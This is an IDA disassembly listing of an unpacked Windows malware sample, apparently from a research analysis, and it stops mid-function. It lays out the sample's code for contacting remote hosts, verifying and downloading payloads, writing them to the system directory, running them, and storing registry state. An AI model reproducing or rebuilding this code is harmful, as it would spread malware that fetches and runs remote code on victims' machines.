;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : B99DD43CB54ED16B0BB045E9B22E799F
; File Name : u:\work\b99dd43cb54ed16b0bb045e9b22e799f_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31430000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31431000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31431000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31431004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31431008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3143100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_31432A49+1D�r
dword_31431010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31431014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_31432A49+4E�r ...
dword_31431018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_3143101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31431020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31431024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_31431028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHashdword_3143102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31431030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31431034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_31431038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h
dword_31431040 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_31431044 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31431048 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_3143104C dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31431050 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31431054 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31431058 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3143105C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31431060 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31431064 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31431068 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_31432D2E+8F�r
dword_3143106C dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_31431070 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_31431074 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_31432C62+F�r
dword_31431078 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_3143107C dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_31431080 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_314311A0+F6�r ...
dword_31431084 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_3143237F+57�r
dword_31431088 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_3143141F+64�r ...
dword_3143108C dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_31432C62+40�r
dword_31431090 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_31432C62+1B�r
dword_31431094 dd 7C80978Eh ; resolved to->KERNEL32.InterlockedExchange ; sub_3143185D+1�r
dword_31431098 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_3143109C dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_314319BC+16C�r ...
dword_314310A0 dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_314310A4 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_314310A8 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_31431FAB+2C�r
dword_314310AC dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_3143256D+124�r
dword_314310B0 dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_314310B4 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_31432AF5+92�r
dword_314310B8 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:314324F1�r
dword_314310BC dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_314310C0 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_314310C4 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_3143210D+12�r
dword_314310C8 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_314310CC dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_314310D0 dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_314310D4 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_3143237F+66�r ...
dword_314310D8 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_3143278A+3E�r ...
dword_314310DC dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_314310E0 dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_314310E4 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_31432C62+C3�r
dd 0
dword_314310EC dd 77C371BCh ; resolved to->MSVCRT.sranddword_314310F0 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_314310F4 dd 77C478A0h ; resolved to->MSVCRT.strlendword_314310F8 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_314310FC dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_3143212E:loc_3143213F�r ...
; ---------------------------------------------------------------------------
loc_31431100: ; DATA XREF: UPX0:loc_31432EA0�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_31431104 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_3143141F+1A0�r ...
dword_31431108 dd 77C1BF18h ; resolved to->MSVCRT.atoidword_3143110C dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_3143141F+B4�r
dd 0
dword_31431114 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_31431118 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_3143111C dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessIddword_31431120 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_31431782+5D�r ...
align 8
dword_31431128 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlA ; sub_31431782+9D�r
dword_3143112C dd 42C2C8A1h ; resolved to->WININET.InternetOpenA ; sub_31431782+89�r
dword_31431130 dd 42C1DAC1h ; resolved to->WININET.InternetCloseHandledword_31431134 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:31432967�r
dword_31431138 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile ; sub_31431782+B0�r
align 10h
dword_31431140 dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_31431144 dd 71AB3E00h ; resolved to->WS2_32.binddword_31431148 dd 71AB88D3h ; resolved to->WS2_32.listendword_3143114C dd 71AC1028h ; resolved to->WS2_32.acceptdword_31431150 dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_31431154 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_31431158 dd 71AB4FD4h ; resolved to->WS2_32.gethostbynamedword_3143115C dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_3143237F+AC�r
dword_31431160 dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_314328D7+D�r
dword_31431164 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_3143237F+F0�r
dword_31431168 dd 71AB406Ah ; resolved to->WS2_32.connectdword_3143116C dd 71AB428Ah ; resolved to->WS2_32.send ; sub_31432239+67�r ...
dword_31431170 dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_314319BC+1D8�r ...
dword_31431174 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_31432239+128�r
dword_31431178 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_31432239+12F�r
align 10h
dword_31431180 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 10h
dword_31431190 dd 0FFFFFFFFh, 0 dd offset nullsub_2
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314311A0 proc near ; CODE XREF: sub_3143141F+172�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_3143112C ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_314311CB
push 1
jmp loc_31431261
; ---------------------------------------------------------------------------
loc_314311CB: ; CODE XREF: sub_314311A0+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_31431090 ; GetSystemDirectoryA
mov edi, dword_3143108C
lea eax, [ebp+var_110]
push offset dword_314341F8
push eax
call edi ; lstrcatA
lea eax, [ebp+var_110]
push 6
push eax
call dword_31431088 ; lstrlenA
lea eax, [ebp+eax+var_110]
push eax
call sub_3143212E
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset dword_314341F0
push eax
call edi ; lstrcatA
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_31431084 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_31431241
push 2
jmp short loc_31431261
; ---------------------------------------------------------------------------
loc_31431241: ; CODE XREF: sub_314311A0+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31431128 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_31431264
push [ebp+var_4]
call dword_31431080 ; CloseHandle
push 3
loc_31431261: ; CODE XREF: sub_314311A0+26�j
; sub_314311A0+9F�j
pop eax
jmp short loc_314312B5
; ---------------------------------------------------------------------------
loc_31431264: ; CODE XREF: sub_314311A0+B4�j
mov edi, 100000h
push edi
call sub_31432E6C
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31431138 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_3143107C ; WriteFile
push [ebp+var_4]
call dword_31431080 ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_3143215E
push ebx
call sub_31432E80
add esp, 0Ch
xor eax, eax
loc_314312B5: ; CODE XREF: sub_314311A0+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_314311A0 endp
; =============== S U B R O U T I N E =======================================
sub_314312BA proc near ; CODE XREF: sub_3143141F+103�p
; sub_3143141F+1DE�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
cmp [esp+arg_8], 0
jle short locret_31431312
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push ebx
push esi
push edi
or edi, 0FFFFFFFFh
inc eax
push 0Fh
lea esi, [ecx+1]
sub edi, ecx
pop ecx
loc_314312D8: ; CODE XREF: sub_314312BA+53�j
mov dl, [eax]
mov bl, [eax-1]
add edx, ecx
add bl, cl
sar edx, 4
and dl, 3
shl bl, 2
or dl, bl
mov [esi-1], dl
mov dl, [eax+1]
mov bl, [eax]
dec dl
add bl, cl
and dl, cl
shl bl, 4
xor dl, bl
add eax, 3
mov [esi], dl
inc esi
inc esi
lea edx, [edi+esi]
cmp edx, [esp+0Ch+arg_8]
jl short loc_314312D8
pop edi
pop esi
pop ebx
locret_31431312: ; CODE XREF: sub_314312BA+5�j
retn
sub_314312BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31431313 proc near ; CODE XREF: sub_31431398+27�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31431346
add ebx, 1Ah
loc_31431346: ; CODE XREF: sub_31431313+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_3143110C
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31431370
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31431393
; ---------------------------------------------------------------------------
loc_31431370: ; CODE XREF: sub_31431313+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31431390
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31431393
; ---------------------------------------------------------------------------
loc_31431390: ; CODE XREF: sub_31431313+68�j
mov al, [ebp+arg_0]
loc_31431393: ; CODE XREF: sub_31431313+5B�j
; sub_31431313+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31431313 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31431398 proc near ; CODE XREF: sub_3143141F+E0�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_314313F5
mov edi, [ebp+arg_0]
push ebx
loc_314313AD: ; CODE XREF: sub_31431398+58�j
sub al, 2
inc [ebp+arg_4]
mov bl, al
mov eax, esi
neg eax
mov byte ptr [ebp+arg_0], bl
push eax
push [ebp+arg_0]
call sub_31431313
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_314313D9
cmp bl, 7Ah
jg short loc_314313D9
movsx esi, bl
sub esi, 61h
loc_314313D9: ; CODE XREF: sub_31431398+34�j
; sub_31431398+39�j
cmp bl, 41h
jl short loc_314313E9
cmp bl, 5Ah
jg short loc_314313E9
movsx esi, bl
sub esi, 41h
loc_314313E9: ; CODE XREF: sub_31431398+44�j
; sub_31431398+49�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_314313AD
pop ebx
jmp short loc_314313F8
; ---------------------------------------------------------------------------
loc_314313F5: ; CODE XREF: sub_31431398+F�j
mov edi, [ebp+arg_0]
loc_314313F8: ; CODE XREF: sub_31431398+5B�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_31431398 endp
; =============== S U B R O U T I N E =======================================
sub_314313FF proc near ; CODE XREF: sub_3143141F+10F�p
; sub_3143141F+1FC�p
arg_0 = dword ptr 4
xor eax, eax
xor ecx, ecx
loc_31431403: ; CODE XREF: sub_314313FF+12�j
mov edx, [esp+arg_0]
movzx edx, byte ptr [ecx+edx]
add eax, edx
inc ecx
cmp ecx, 30h
jl short loc_31431403
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, edx
add eax, 61h
retn
sub_314313FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3143141F proc near ; CODE XREF: sub_31431782+BA�p
var_1EC = dword ptr -1ECh
var_1E8 = byte ptr -1E8h
var_1CC = byte ptr -1CCh
var_1B8 = dword ptr -1B8h
var_1B4 = byte ptr -1B4h
var_184 = dword ptr -184h
var_180 = dword ptr -180h
var_17C = dword ptr -17Ch
var_178 = byte ptr -178h
var_174 = byte ptr -174h
var_16C = byte ptr -16Ch
var_168 = byte ptr -168h
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = byte ptr -128h
var_120 = byte ptr -120h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31431180
push offset loc_31432EA0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1DCh
push ebx
push esi
push edi
mov [ebp+var_12C], 1
and [ebp+var_4], 0
push offset aZer0 ; "zer0"
push [ebp+arg_0]
call dword_31431104 ; strstr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_134], esi
test esi, esi
jz loc_314315B7
add esi, 4
mov [ebp+var_134], esi
jz loc_314315B7
push esi
call dword_31431088 ; lstrlenA
mov [ebp+var_20], eax
cmp eax, 50h
jle loc_314315B7
lea eax, [esi+100h]
mov cl, [eax]
mov [ebp+var_174], cl
and byte ptr [eax], 0
mov al, [esi]
mov [ebp+var_16C], al
movsx ebx, al
sub ebx, 61h
mov [ebp+var_130], ebx
js loc_314315AB
cmp ebx, 1Ah
jge loc_314315AB
inc esi
mov [ebp+var_134], esi
push 7Eh
push esi
call dword_3143110C ; strchr
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_138], edi
test edi, edi
jz loc_314315AB
mov al, [edi]
mov [ebp+var_178], al
and byte ptr [edi], 0
push ebx
push esi
lea eax, [ebp+var_120]
push eax
call sub_31431398
mov al, [ebp+var_178]
mov [edi], al
lea esi, [edi+1]
mov [ebp+var_134], esi
push 30h
lea eax, [ebp+var_168]
push eax
lea eax, [esi+1]
push eax
call sub_314312BA
lea eax, [ebp+var_168]
push eax
call sub_314313FF
add esp, 1Ch
cmp [esi], al
jnz short loc_314315AB
push 44h
push offset dword_31434000
lea eax, [ebp+var_128]
push eax
call sub_314318EA
add esp, 0Ch
lea eax, [ebp+var_1C]
push eax
push 30h
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_120]
push eax
call dword_31431088 ; lstrlenA
push eax
lea eax, [ebp+var_120]
push eax
lea eax, [ebp+var_128]
push eax
call sub_31431955
add esp, 18h
test eax, eax
jnz short loc_3143159E
cmp [ebp+var_1C], eax
jz short loc_3143159E
lea eax, [ebp+var_120]
push eax
call sub_314311A0
pop ecx
and [ebp+var_12C], 0
loc_3143159E: ; CODE XREF: sub_3143141F+164�j
; sub_3143141F+169�j
lea eax, [ebp+var_128]
push eax
call sub_31431939
pop ecx
loc_314315AB: ; CODE XREF: sub_3143141F+9B�j
; sub_3143141F+A4�j ...
mov al, [ebp+var_174]
mov [esi+100h], al
loc_314315B7: ; CODE XREF: sub_3143141F+4E�j
; sub_3143141F+5D�j ...
push offset aZer1 ; "zer1"
push [ebp+arg_0]
call dword_31431104 ; strstr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_134], esi
test esi, esi
jz loc_31431763
add esi, 4
mov [ebp+var_134], esi
push esi
call dword_31431088 ; lstrlenA
mov [ebp+var_20], eax
cmp eax, 5Ah
jle loc_31431763
push 0Ch
lea eax, [ebp+var_184]
push eax
push esi
call sub_314312BA
push 30h
lea eax, [ebp+var_1B4]
push eax
lea eax, [esi+13h]
push eax
call sub_314312BA
lea eax, [ebp+var_1B4]
push eax
call sub_314313FF
add esp, 1Ch
cmp [esi+12h], al
jnz loc_31431763
push 44h
push offset dword_31434000
lea eax, [ebp+var_128]
push eax
call sub_314318EA
lea eax, [ebp+var_1C]
push eax
push 30h
lea eax, [ebp+var_1B4]
push eax
push 0Ch
lea eax, [ebp+var_184]
push eax
lea eax, [ebp+var_128]
push eax
call sub_31431955
add esp, 24h
test eax, eax
jnz loc_31431756
cmp [ebp+var_1C], eax
jz loc_31431756
push 7
pop ecx
mov esi, offset aSoftwareMicros ; "Software\\Microsoft\\Wireless"
lea edi, [ebp+var_1E8]
rep movsd
mov eax, dword_3143426C
mov [ebp+var_1B8], eax
push 13h
lea eax, [ebp+var_1CC]
push eax
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_1E8]
push eax
mov esi, 80000002h
push esi
call sub_31432A49
add esp, 14h
test eax, eax
jnz short loc_314316CF
lea eax, [ebp+var_1CC]
push eax
call dword_31431108 ; atoi
pop ecx
mov [ebp+var_1EC], eax
jmp short loc_314316D6
; ---------------------------------------------------------------------------
loc_314316CF: ; CODE XREF: sub_3143141F+298�j
and [ebp+var_1EC], 0
loc_314316D6: ; CODE XREF: sub_3143141F+2AE�j
mov eax, [ebp+var_184]
cmp [ebp+var_1EC], eax
jnb short loc_3143174F
mov [ebp+var_1EC], eax
push eax
push offset aD ; "%d"
lea eax, [ebp+var_1CC]
push eax
call dword_31431120 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_1CC]
push eax
call dword_31431088 ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_1CC]
push eax
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_1E8]
push eax
push esi
call sub_31432AA2
add esp, 14h
cmp dword_31435048, 0
jnz short loc_3143173E
push [ebp+var_180]
jmp short loc_31431744
; ---------------------------------------------------------------------------
loc_3143173E: ; CODE XREF: sub_3143141F+315�j
push [ebp+var_17C]
loc_31431744: ; CODE XREF: sub_3143141F+31D�j
push offset dword_3143504C
call dword_31431094 ; InterlockedExchange
loc_3143174F: ; CODE XREF: sub_3143141F+2C3�j
and [ebp+var_12C], 0
loc_31431756: ; CODE XREF: sub_3143141F+247�j
; sub_3143141F+250�j
lea eax, [ebp+var_128]
push eax
call sub_31431939
pop ecx
loc_31431763: ; CODE XREF: sub_3143141F+1B2�j
; sub_3143141F+1CE�j ...
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
mov eax, [ebp+var_12C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_3143141F endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31431782 proc near ; CODE XREF: sub_3143185D+2A�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
push 4000h
call sub_31432E6C
pop ecx
mov esi, eax
lea eax, [ebp+var_E8]
push 63h
push eax
push 7
push 400h
call dword_31431098 ; GetLocaleInfoA
xor ebx, ebx
cmp byte ptr [ebp+arg_4], bl
jz short loc_314317EA
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_84]
push dword_3143502C
push dword_31435044
push offset aGnihgcmsdqchen ; "gnihgcmsdqchenj"
push [ebp+arg_0]
push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"...
push eax
call dword_31431120 ; wsprintfA
add esp, 1Ch
jmp short loc_31431802
; ---------------------------------------------------------------------------
loc_314317EA: ; CODE XREF: sub_31431782+34�j
push [ebp+arg_0]
lea eax, [ebp+var_84]
push offset aHttpS ; "http://%s"
push eax
call dword_31431120 ; wsprintfA
add esp, 0Ch
loc_31431802: ; CODE XREF: sub_31431782+66�j
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_3143112C ; InternetOpenA
push ebx
mov edi, eax
push ebx
push ebx
lea eax, [ebp+var_84]
push ebx
push eax
push edi
call dword_31431128 ; InternetOpenUrlA
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push 2000h
push esi
push ebx
call dword_31431138 ; InternetReadFile
push esi
mov [ebp+arg_4], eax
call sub_3143141F
push esi
call sub_31432E80
mov esi, dword_31431130
pop ecx
pop ecx
push ebx
call esi ; InternetCloseHandle
push edi
call esi ; InternetCloseHandle
mov eax, [ebp+arg_4]
pop edi
pop esi
pop ebx
leave
retn
sub_31431782 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_3143185D proc near ; DATA XREF: sub_3143256D+169�o
push ebx
mov ebx, dword_31431094
push esi
push edi
loc_31431866: ; CODE XREF: sub_3143185D+88�j
xor esi, esi
mov edi, 46021h
loc_3143186D: ; CODE XREF: sub_3143185D+86�j
inc esi
inc esi
call sub_314321F3
test eax, eax
jz short loc_314318B7
mov al, byte_31434080[esi+esi*4]
push eax
push off_31434081[esi+esi*4]
call sub_31431782
or eax, edi
pop ecx
xor eax, 8064h
pop ecx
shl eax, 3
mov edi, eax
xor eax, 228h
test ax, 0FFFFh
jnz short loc_314318B7
push 0
push offset dword_31435044
call ebx ; InterlockedExchange
push 0
push offset dword_3143502C
call ebx ; InterlockedExchange
loc_314318B7: ; CODE XREF: sub_3143185D+19�j
; sub_3143185D+46�j
call dword_314310FC ; rand
push 3
cdq
pop ecx
idiv ecx
add esi, edx
call sub_31432223
xor edx, edx
mov ecx, 493E0h
div ecx
add edx, 61B48h
push edx
call dword_3143109C ; Sleep
cmp esi, 16h
jb short loc_3143186D
jmp loc_31431866
sub_3143185D endp
; =============== S U B R O U T I N E =======================================
sub_314318EA proc near ; CODE XREF: sub_3143141F+129�p
; sub_3143141F+21B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, dword_31431034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_31431917
push 8
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_31431917
push 1
pop eax
jmp short loc_31431935
; ---------------------------------------------------------------------------
loc_31431917: ; CODE XREF: sub_314318EA+19�j
; sub_314318EA+26�j
lea eax, [ebx+4]
push eax
push edi
push edi
push [esp+18h+arg_8]
push [esp+1Ch+arg_4]
push dword ptr [ebx]
call dword_31431038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_31431935: ; CODE XREF: sub_314318EA+2B�j
pop edi
pop esi
pop ebx
retn
sub_314318EA endp
; =============== S U B R O U T I N E =======================================
sub_31431939 proc near ; CODE XREF: sub_3143141F+186�p
; sub_3143141F+33E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+4]
call dword_3143102C ; CryptDestroyKey
push 0
push dword ptr [esi]
call dword_31431030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_31431939 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31431955 proc near ; CODE XREF: sub_3143141F+15A�p
; sub_3143141F+23D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [esi]
call dword_3143101C ; CryptCreateHash
test eax, eax
jnz short loc_3143197B
push 1
pop eax
jmp short loc_314319B8
; ---------------------------------------------------------------------------
loc_3143197B: ; CODE XREF: sub_31431955+1F�j
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31431020 ; CryptHashData
test eax, eax
jnz short loc_31431994
push 2
pop edi
jmp short loc_314319AD
; ---------------------------------------------------------------------------
loc_31431994: ; CODE XREF: sub_31431955+38�j
push edi
push edi
push dword ptr [esi+4]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call dword_31431024 ; CryptVerifySignatureA
mov ecx, [ebp+arg_14]
mov [ecx], eax
loc_314319AD: ; CODE XREF: sub_31431955+3D�j
push [ebp+arg_0]
call dword_31431028 ; CryptDestroyHash
mov eax, edi
loc_314319B8: ; CODE XREF: sub_31431955+24�j
pop edi
pop esi
pop ebp
retn
sub_31431955 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314319BC proc near ; CODE XREF: sub_31432728+35�p
; sub_3143278A+47�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
